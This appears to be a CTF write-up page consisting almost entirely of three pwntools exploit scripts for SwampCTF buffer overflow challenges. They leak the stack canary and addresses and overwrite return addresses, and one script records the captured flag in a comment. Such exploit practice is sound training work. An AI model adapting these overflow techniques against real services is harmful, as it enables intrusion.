dplastico

Oh my Buffer

A buffer overflow in 2025

#!/usr/bin/env python3

from pwn import *

elf = ELF("./binary_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b login
b reg
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("chals.swampctf.com", 40005)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value


def reg(user, password):
    sl(b"1")
    sla(b"name: ", user)
    sla(b"Password: ", password)

#for leak?
def login(size, user):
    sl(b"2")
    sla(b"How long is your username: ", bc(size))
    sa(b"Username: ", user)
    #memleak = rcu(b"Sorry, we couldn't find the user: ", b"Welcome to the box!")
    #print(memleak)
    #rcu(b">")
#========= exploit here ===================
rcu(b">")
login(0x70, b"BBBBBBBB")
#
leak = rcu(b"Sorry, we couldn't find the user: BBBBBBBB", b"===================")
bin_leak = u64(leak[:0x8].ljust(8,b"\x00"))
canary = u64(leak[0x10:0x18])
stack_leak = u64(leak[0x18:0x20])
heap_leak = u64(leak[0x38:0x40])
flag_loc = heap_leak + 0x1e0
rcu(b">")
##win 4013D8?
logleak("bin leak", bin_leak)
logleak("canary", canary)
logleak("stack leak", heap_leak)
logleak("heap leak", heap_leak)
payload_loc = (stack_leak-0xa0)+0x20

payload = b"A"*0x10
payload += p64(0xdeadbeef)#rbp
payload += p64(canary)#canary 0x20
payload += p64(flag_loc+0x20)#rbp (rw)
payload += p64(0x40139B)

reg(b"Y"*8, payload)
##========= interactive ====================
r.interactive()

pwn1

#!/usr/bin/env python3

from pwn import *

elf = ELF("./is_admin_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("chals.swampctf.com", 40004)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
r.timeout = 1
payload = b"A"*0xE
#payload += 
sla(b"please enter your name:", payload)

#========= interactive ====================
r.interactive()

pwn2

#!/usr/bin/env python3

from pwn import *

elf = ELF("./binary_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("chals.swampctf.com", 40001)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
payload = b"A"*0x12
payload += p64(0x401186)
sl(payload)
#swampCTF{1t5_t1m3_t0_r3turn!!}
#========= interactive ====================
r.interactive()